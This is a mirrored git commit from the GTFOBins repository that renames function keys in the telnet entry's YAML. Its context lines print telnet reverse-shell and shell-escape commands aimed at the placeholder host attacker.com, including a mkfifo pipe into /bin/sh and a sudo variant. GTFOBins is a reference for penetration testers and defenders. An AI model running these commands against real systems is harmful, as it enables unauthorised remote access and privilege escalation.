mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-20 23:29:23 +02:00
Adopt new function names
This commit is contained in:
@@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@@ -8,14 +8,14 @@ functions:
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
TF=$(mktemp -u)
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@@ -23,7 +23,7 @@ functions:
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
Reference in New Issue
Block a user